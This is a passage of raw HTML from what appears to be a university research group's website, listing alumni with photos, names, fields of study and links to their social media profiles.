style-local-182-c226-outer\">\n            <div data-colibri-id=\"182-c226\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-925 style-local-182-c226 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c227\" class=\"h-global-transition-all h-heading style-926 style-local-182-c227 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-926 style-local-182-c227\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Alumni</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c160\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-911 style-local-182-c160 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c161-outer\">\n            <div data-colibri-id=\"182-c161\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c161 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c162\" class=\"d-block style-913 style-local-182-c162 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Sarah_Akinola-scaled-2-e1697208116294.jpg\" class=\"wp-image-1772 style-913-image style-local-182-c162-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c162-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c163\" class=\"h-global-transition-all h-heading style-914 style-local-182-c163 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c163\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sarah Akinola</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c164\" class=\"h-text h-text-component style-915 style-local-182-c164 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c165\" class=\"style-917 style-local-182-c165 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/akinola-sarah-035789138\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c166-outer\">\n            <div data-colibri-id=\"182-c166\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c166 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c167\" class=\"d-block style-918 style-local-182-c167 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Anvith-e1697208489419.jpg\" class=\"wp-image-1780 style-918-image style-local-182-c167-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-918-frameImage style-local-182-c167-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c168\" class=\"h-global-transition-all h-heading style-914 style-local-182-c168 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c168\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anvith Anand</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c169\" class=\"h-text h-text-component style-915 style-local-182-c169 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c170\" class=\"style-919 style-local-182-c170 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anvith-anand\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c171-outer\">\n            <div data-colibri-id=\"182-c171\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c171 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c172\" class=\"d-block style-920 style-local-182-c172 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-Alex-e1697208598736.jpg\" class=\"wp-image-1782 style-920-image style-local-182-c172-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-920-frameImage style-local-182-c172-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c173\" class=\"h-global-transition-all h-heading style-914 style-local-182-c173 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c173\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Alex Asige</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c174\" class=\"h-text h-text-component style-915 style-local-182-c174 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c175\" class=\"style-921 style-local-182-c175 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://twitter.com/i/flow/login?redirect_after_login=%2FAsigeAlex\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1347.656 445.313c0 11.719 0 26.367 0 38.086 0 407.227-310.547 875.977-875.977 875.977-172.852 0-336.914-49.805-471.68-137.695 23.438 2.93 49.805 2.93 73.242 2.93 143.555 0 278.32-46.875 383.789-131.836-134.766 0-249.023-90.82-290.039-213.867 20.508 5.859 38.086 5.859 58.594 5.859 29.297 0 55.664-2.93 82.031-8.789-140.625-29.297-246.094-155.273-246.094-301.758 0-2.93 0-2.93 0-5.859 41.016 23.438 87.891 38.086 137.695 38.086-82.031-52.734-137.695-149.414-137.695-254.883 0-55.664 17.578-108.398 43.945-155.273 149.414 187.5 377.93 310.547 632.813 322.266-5.859-23.438-8.789-46.875-8.789-70.313 0-169.922 137.695-307.617 307.617-307.617 90.82 0 169.922 38.086 225.586 96.68 70.313-14.648 137.695-38.086 196.289-73.242-23.438 70.313-73.242 131.836-134.766 169.922 61.523-8.789 120.117-23.438 175.781-49.805-41.016 61.523-93.75 117.188-152.344 161.133z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c176-outer\">\n            <div data-colibri-id=\"182-c176\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c176 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c177\" class=\"d-block style-922 style-local-182-c177 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Bhavya-scaled-1-e1697208670956.jpg\" class=\"wp-image-1784 style-922-image style-local-182-c177-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-922-frameImage style-local-182-c177-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c178\" class=\"h-global-transition-all h-heading style-914 style-local-182-c178 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c178\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Bhavya Busireddy</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c179\" class=\"h-text h-text-component style-915 style-local-182-c179 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c180\" class=\"style-923 style-local-182-c180 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/bhavya-busireddy-b052b192/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c181-outer\">\n            <div data-colibri-id=\"182-c181\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c181 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c182\" class=\"d-block style-913 style-local-182-c182 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Vineeth-e1697208720256.jpg\" class=\"wp-image-1786 style-913-image style-local-182-c182-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c182-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c183\" class=\"h-global-transition-all h-heading style-914 style-local-182-c183 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c183\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Vineeth Kumar Chandha</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c184\" class=\"h-text h-text-component style-915 style-local-182-c184 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c185\" class=\"style-917 style-local-182-c185 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/vineeth-kumar-chandha-207611149/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c186-outer\">\n            <div data-colibri-id=\"182-c186\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c186 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c187\" class=\"d-block style-913 style-local-182-c187 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-cropped-sathwik-2-scaled-1-e1697208827396.jpg\" class=\"wp-image-1788 style-913-image style-local-182-c187-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c187-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c188\" class=\"h-global-transition-all h-heading style-914 style-local-182-c188 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c188\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sathwik Chowda</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c189\" class=\"h-text h-text-component style-915 style-local-182-c189 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c190\" class=\"style-917 style-local-182-c190 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sathwikchowda/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c191-outer\">\n            <div data-colibri-id=\"182-c191\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c191 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c192\" class=\"d-block style-913 style-local-182-c192 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-Brindal-e1697208968672.jpeg\" class=\"wp-image-1790 style-913-image style-local-182-c192-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c192-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c193\" class=\"h-global-transition-all h-heading style-914 style-local-182-c193 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c193\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Brindal Dhol</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c194\" class=\"h-text h-text-component style-915 style-local-182-c194 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c195\" class=\"style-917 style-local-182-c195 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/brindaldhol/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 